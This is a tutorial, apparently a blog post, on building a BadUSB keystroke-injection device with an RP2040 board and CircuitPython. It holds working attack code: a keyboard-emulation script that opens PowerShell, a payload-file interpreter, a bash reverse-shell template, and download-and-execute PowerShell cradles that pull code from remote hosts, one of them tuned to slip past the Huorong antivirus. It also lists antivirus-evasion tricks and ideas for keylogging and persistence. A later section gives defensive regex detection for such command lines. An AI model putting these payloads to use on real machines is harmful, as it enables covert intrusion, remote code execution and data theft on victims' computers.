Implementing an entry-level BadUSB framework
Word count: 1364 | 2025-08-22 12:22:54
BadUSB entry-level framework implementation tutorial
1. BadUSB overview
BadUSB is a technique based on HID (Human Interface Device) attacks: a device disguised as an input device (such as a keyboard) performs malicious actions on the victim's computer. Its core principle is to exploit the trust the host places in USB devices and to emulate keyboard input so that the attack completes quickly.
1.1 Typical attack scenarios
- Rapidly performing keyboard actions (such as opening a terminal and running commands)
- Evading traditional antivirus detection (because input behaviour is usually not treated as a threat)
- Usable for privilege escalation, backdoor implantation and similar operations
2. Hardware choice
2.1 Recommended hardware
- RP2040 chip: fingernail-sized and cheap (about 10 yuan)
- Pico Mini: an RP2040-based development board well suited to BadUSB implementations
- O.MG Cable: a commercial product, a BadUSB device disguised as a data cable
2.2 Hardware advantages
- Low cost (the DIY approach costs only around 10 yuan)
- Small size, easy to conceal
- Supports the CircuitPython development environment
3. Development environment setup
3.1 Firmware choice
- CircuitPython: recommended; compared with MicroPython it has the following advantages:
  - Plug and play
  - Together with the Adafruit_CircuitPython_HID library it can easily emulate an HID device
  - Python syntax, simple to develop with
3.2 Required libraries
- usb_hid: basic HID functionality
- adafruit_hid.keyboard: keyboard emulation
- adafruit_hid.keycode: key code mapping
4. Core code implementation
4.1 Basic keyboard emulation
```python
import time
import usb_hid
from adafruit_hid.keyboard import Keyboard
from adafruit_hid.keycode import Keycode

# Create the keyboard object
keyboard = Keyboard(usb_hid.devices)

# Key-map dictionary (the full version follows below)
key_map = {
    'WINDOWS': Keycode.WINDOWS,
    'GUI': Keycode.GUI,
    'a': Keycode.A,
    'A': (Keycode.SHIFT, Keycode.A),
    # other key mappings ...
}

# Basic key-press example
keyboard.press(Keycode.WINDOWS)  # press the Windows key
keyboard.press(Keycode.R)        # press R
keyboard.release_all()           # release all keys
```
4.2 Complete key-map table
```python
# Maps a single character or a named key to a Keycode, or to a
# (modifier, key) tuple for characters that need SHIFT.
key_map = {
    'WINDOWS': Keycode.WINDOWS,
    'GUI': Keycode.GUI,
    'APP': Keycode.APPLICATION,
    'MENU': Keycode.APPLICATION,
    'SHIFT': Keycode.SHIFT,
    'ALT': Keycode.ALT,
    'CONTROL': Keycode.CONTROL,
    'CTRL': Keycode.CONTROL,
    'DOWNARROW': Keycode.DOWN_ARROW,
    'DOWN': Keycode.DOWN_ARROW,
    'LEFTARROW': Keycode.LEFT_ARROW,
    'LEFT': Keycode.LEFT_ARROW,
    'RIGHTARROW': Keycode.RIGHT_ARROW,
    'RIGHT': Keycode.RIGHT_ARROW,
    'UPARROW': Keycode.UP_ARROW,
    'UP': Keycode.UP_ARROW,
    'BREAK': Keycode.PAUSE,
    'PAUSE': Keycode.PAUSE,
    'CAPSLOCK': Keycode.CAPS_LOCK,
    'DELETE': Keycode.DELETE,
    'END': Keycode.END,
    'ESC': Keycode.ESCAPE,
    'ESCAPE': Keycode.ESCAPE,
    'HOME': Keycode.HOME,
    'INSERT': Keycode.INSERT,
    'NUMLOCK': Keycode.KEYPAD_NUMLOCK,
    'PAGEUP': Keycode.PAGE_UP,
    'PAGEDOWN': Keycode.PAGE_DOWN,
    'PRINTSCREEN': Keycode.PRINT_SCREEN,
    'ENTER': Keycode.ENTER,
    'SCROLLLOCK': Keycode.SCROLL_LOCK,
    'SPACE': Keycode.SPACE,
    'TAB': Keycode.TAB,
    'BACKSPACE': Keycode.BACKSPACE,
    'a': Keycode.A,
    'b': Keycode.B,
    'c': Keycode.C,
    'd': Keycode.D,
    'e': Keycode.E,
    'f': Keycode.F,
    'g': Keycode.G,
    'h': Keycode.H,
    'i': Keycode.I,
    'j': Keycode.J,
    'k': Keycode.K,
    'l': Keycode.L,
    'm': Keycode.M,
    'n': Keycode.N,
    'o': Keycode.O,
    'p': Keycode.P,
    'q': Keycode.Q,
    'r': Keycode.R,
    's': Keycode.S,
    't': Keycode.T,
    'u': Keycode.U,
    'v': Keycode.V,
    'w': Keycode.W,
    'x': Keycode.X,
    'y': Keycode.Y,
    'z': Keycode.Z,
    'A': (Keycode.SHIFT, Keycode.A),
    'B': (Keycode.SHIFT, Keycode.B),
    'C': (Keycode.SHIFT, Keycode.C),
    'D': (Keycode.SHIFT, Keycode.D),
    'E': (Keycode.SHIFT, Keycode.E),
    'F': (Keycode.SHIFT, Keycode.F),
    'G': (Keycode.SHIFT, Keycode.G),
    'H': (Keycode.SHIFT, Keycode.H),
    'I': (Keycode.SHIFT, Keycode.I),
    'J': (Keycode.SHIFT, Keycode.J),
    'K': (Keycode.SHIFT, Keycode.K),
    'L': (Keycode.SHIFT, Keycode.L),
    'M': (Keycode.SHIFT, Keycode.M),
    'N': (Keycode.SHIFT, Keycode.N),
    'O': (Keycode.SHIFT, Keycode.O),
    'P': (Keycode.SHIFT, Keycode.P),
    'Q': (Keycode.SHIFT, Keycode.Q),
    'R': (Keycode.SHIFT, Keycode.R),
    'S': (Keycode.SHIFT, Keycode.S),
    'T': (Keycode.SHIFT, Keycode.T),
    'U': (Keycode.SHIFT, Keycode.U),
    'V': (Keycode.SHIFT, Keycode.V),
    'W': (Keycode.SHIFT, Keycode.W),
    'X': (Keycode.SHIFT, Keycode.X),
    'Y': (Keycode.SHIFT, Keycode.Y),
    'Z': (Keycode.SHIFT, Keycode.Z),
    '0': Keycode.ZERO,
    '1': Keycode.ONE,
    '2': Keycode.TWO,
    '3': Keycode.THREE,
    '4': Keycode.FOUR,
    '5': Keycode.FIVE,
    '6': Keycode.SIX,
    '7': Keycode.SEVEN,
    '8': Keycode.EIGHT,
    '9': Keycode.NINE,
    ' ': Keycode.SPACE,
    '-': Keycode.MINUS,
    '/': Keycode.FORWARD_SLASH,
    '.': Keycode.PERIOD,
    ',': Keycode.COMMA,  # missing from the original table; lookups of ',' raised KeyError
    ':': (Keycode.SHIFT, Keycode.SEMICOLON),
    ';': Keycode.SEMICOLON,
    '\'': Keycode.QUOTE,
    '"': (Keycode.SHIFT, Keycode.QUOTE),
    '(': (Keycode.SHIFT, Keycode.NINE),
    ')': (Keycode.SHIFT, Keycode.ZERO),
    '_': (Keycode.SHIFT, Keycode.MINUS),
    '=': Keycode.EQUALS,
    '!': (Keycode.SHIFT, Keycode.ONE),
    '@': (Keycode.SHIFT, Keycode.TWO),
    '#': (Keycode.SHIFT, Keycode.THREE),
    '$': (Keycode.SHIFT, Keycode.FOUR),
    '%': (Keycode.SHIFT, Keycode.FIVE),
    '^': (Keycode.SHIFT, Keycode.SIX),
    '&': (Keycode.SHIFT, Keycode.SEVEN),
    '*': (Keycode.SHIFT, Keycode.EIGHT),
    '+': (Keycode.SHIFT, Keycode.EQUALS),
    '[': Keycode.LEFT_BRACKET,
    ']': Keycode.RIGHT_BRACKET,
    '{': (Keycode.SHIFT, Keycode.LEFT_BRACKET),
    '}': (Keycode.SHIFT, Keycode.RIGHT_BRACKET),
    '\\': Keycode.BACKSLASH,
    '|': (Keycode.SHIFT, Keycode.BACKSLASH),
    '<': (Keycode.SHIFT, Keycode.COMMA),
    '>': (Keycode.SHIFT, Keycode.PERIOD),
    '?': (Keycode.SHIFT, Keycode.FORWARD_SLASH),
    # the original repeated the '"' entry here; a duplicate dict key silently
    # overwrites the earlier one, so it has been dropped. '`' and '~' are not mapped.
}
```
4.3 Basic functionality
```python
def press_key(mapped):
    """Press one key_map entry and release it.

    Entries are either a single Keycode or a (modifier, key) tuple; the
    original passed the tuple itself to press(), which raises a TypeError.
    """
    if isinstance(mapped, tuple):
        keyboard.press(*mapped)
    else:
        keyboard.press(mapped)
    keyboard.release_all()


def main():
    try:
        # Wait one second so the host finishes enumerating the device
        time.sleep(1)
        # Open the Run dialog (Win+R)
        keyboard.press(Keycode.WINDOWS)
        keyboard.press(Keycode.R)
        keyboard.release_all()
        time.sleep(1)
        # Type "powershell"
        for char in "powershell":
            press_key(key_map[char])
            time.sleep(0.1)
        # Enter to run it
        keyboard.press(Keycode.ENTER)
        keyboard.release_all()
        # Type the payload
        payload = "echo HelloWorld"
        for char in payload:
            press_key(key_map[char])
            time.sleep(0.1)
        # Enter to run it
        keyboard.press(Keycode.ENTER)
        keyboard.release_all()
    except Exception as e:
        print(f"Error occurred: {e}")
        keyboard.release_all()
        raise


if __name__ == "__main__":
    main()
```
5. Extending the framework
5.1 Modular design
```python
paylist = []     # stores payload commands
delay_time = 1   # seconds to wait between steps; changed by "set Time <n>"


def set_time(value):
    """Handle "set Time <seconds>" (the original called set_time without defining it)."""
    global delay_time
    delay_time = float(value)


def Rpayload():
    """Read commands from payload.txt.

    powershell() and toggleinput() are the modules defined in section 5.2.
    """
    with open('payload.txt', 'r') as payload:
        for line in payload:
            line = line.strip()
            if line == "POWERSHELL":
                powershell()
            elif line == "TOGGLE_INPUT":
                toggleinput()
            elif line[:3] == "set":
                if line[:8] == "set Time":
                    set_time(line[9:])
            # handling of other commands ...
    return paylist


def main():
    Rpayload()
```
5.2 Common functional modules
5.2.1 PowerShell module
```python
def powershell():
    """Open a PowerShell window via the Run dialog. Uses press_key() from section 4.3."""
    try:
        time.sleep(delay_time)
        # Win+R
        keyboard.press(Keycode.WINDOWS)
        keyboard.press(Keycode.R)
        keyboard.release_all()
        time.sleep(delay_time)
        # Type "powershell"
        for char in "powershell":
            press_key(key_map[char])
            time.sleep(0.1)
        # Enter to run it
        keyboard.press(Keycode.ENTER)
        keyboard.release_all()
    except Exception as e:
        print(f"Error occurred: {e}")
        keyboard.release_all()
        raise
    return "OK"
```
5.2.2 Input-method toggle module
```python
def toggleinput():
    """Switch the input method with Ctrl+Space."""
    try:
        keyboard.press(key_map['CTRL'])
        time.sleep(1)
        keyboard.press(key_map['SPACE'])
        time.sleep(0.5)
        keyboard.release_all()
    except Exception as e:
        print(f"Error occurred: {e}")
        keyboard.release_all()
        raise
```
5.2.3 Linux module
```python
def linux_openshell():
    """Open a Linux terminal"""
    # Implement per distribution
    pass


def linux_reshell(ip, port):
    """Linux reverse shell"""
    payload = f"bash -i >& /dev/tcp/{ip}/{port} 0>&1"
    # Run the payload
    pass
```
5.3 Configuration file design
Example payload.txt:
```text
set Time 1
POWERSHELL
TOGGLE_INPUT
ECHO HelloWorld
ECHO PASS
POWERSHELL
ECHO test
```
Syntax notes:
- Upper-case commands are module calls (such as POWERSHELL)
- ECHO is followed by the text to type on the keyboard
- set sets a parameter and is followed by the value
6. Attack payload examples
6.1 Basic attack payload
```text
POWERSHELL
TOGGLE_INPUT
ECHO powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.255.1:8029/a'))"
```
6.2 Payload that bypasses Huorong detection
Huorong intercepts the -WindowStyle Hidden operation; it can be bypassed as follows:
```text
POWERSHELL
TOGGLE_INPUT
ECHO Start-Process -WindowStyle Hidden powershell.exe -ArgumentList '-NoProfile', '-Command', 'IEX ((new-object net.webclient).downloadstring(''http://192.168.56.1:8065/a''))'
ECHO exit
```
7. AV evasion techniques
- Network loading: store the payload on a remote server and download and run it at execution time
- Flash storage: store the payload in the device's flash memory and call it from there
- Code obfuscation: split sensitive strings and concatenate them at run time
- Behavioural evasion:
  - Avoid using sensitive parameters directly (such as -w hidden)
  - Use indirect invocation (such as via Start-Process)
  - Add normal operations as cover
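From the defender's side, the two launch patterns in section 6 and the behaviour-evasion points in section 7 share the same observable: a process-creation command line that asks for a hidden PowerShell window (directly, or through Start-Process) and carries a download-and-execute cradle. The following Python is an added example, not part of the original post; it scores constructed sample command lines (the host name PLACEHOLDER-HOST is a stand-in) and flags both the direct and the Start-Process form.

```python
import re

# Constructed sample process-creation command lines (not real telemetry): the
# direct and the Start-Process launch patterns from section 6 plus two benign
# controls. PLACEHOLDER-HOST stands in for the download server.
SAMPLE_CMDLINES = [
    "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient)"
    ".downloadstring('http://PLACEHOLDER-HOST/a'))\"",
    "powershell.exe -Command \"Start-Process -WindowStyle Hidden powershell.exe "
    "-ArgumentList '-NoProfile', '-Command', "
    "'IEX ((new-object net.webclient).downloadstring(''http://PLACEHOLDER-HOST/a''))'\"",
    "powershell.exe -NoProfile -Command Get-Date",
    "notepad.exe C:\\Users\\Public\\notes.txt",
]

# PowerShell accepts any unambiguous prefix of -WindowStyle (-w, -win, ...) and
# "h" for Hidden, so match every prefix, not only the two spellings on the page.
_WS_PREFIXES = "|".join("indowstyle"[:i] for i in range(10, -1, -1))
HIDDEN_WINDOW = re.compile(rf"-w(?:{_WS_PREFIXES})\s+h(?:idden)?\b", re.I)
# A second PowerShell started through Start-Process (the indirect form in 6.2)
INDIRECT_LAUNCH = re.compile(r"start-process\b.*\bpowershell", re.I)
# Pieces of a download-and-execute cradle
DOWNLOAD_CRADLE = re.compile(
    r"net\.webclient|downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
    r"\biex\b|invoke-expression", re.I)


def score_cmdline(cmdline):
    """Return (severity, reasons): high = launch evasion plus a cradle,
    medium = only one of the two indicator groups, none = neither."""
    reasons = []
    if HIDDEN_WINDOW.search(cmdline):
        reasons.append("hidden window requested")
    if INDIRECT_LAUNCH.search(cmdline):
        reasons.append("powershell launched via Start-Process")
    if DOWNLOAD_CRADLE.search(cmdline):
        reasons.append("download-and-execute cradle")
    cradle = "download-and-execute cradle" in reasons
    launch_evasion = len(reasons) > (1 if cradle else 0)
    if launch_evasion and cradle:
        return "high", reasons
    if launch_evasion or cradle:
        return "medium", reasons
    return "none", reasons


def scan(cmdlines):
    """Score every command line and keep only the ones worth alerting on."""
    return [(sev, why, line) for line in cmdlines
            for sev, why in [score_cmdline(line)] if sev != "none"]
```

Feed it the CommandLine field of Windows event 4688 or Sysmon event 1 records; the rule deliberately scores the hidden-window request on its own as medium so the Start-Process indirection from section 6.2 does not drop below the radar.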
8. Extended functionality
- Keylogging: listen for and record user input
- Conditional triggering: trigger at a specific time or after a specific action
- Multi-platform support: adapt to Windows/Linux/macOS
- Persistence: implement an automatic persistence mechanism
9. References
- CircuitPython HID Keyboard and Mouse
- Adafruit_CircuitPython_HID project documentation
- O.MG Cable official documentation
10. Notes
- This technique is for legally authorised testing only
- Real deployments must account for differences in the target environment
- Pay attention to the keystroke delay settings; different computers respond at different speeds
- When testing, verify functionality with harmless commands first
With the framework above you can quickly build a fully functional BadUSB device and extend and customise it to your actual needs.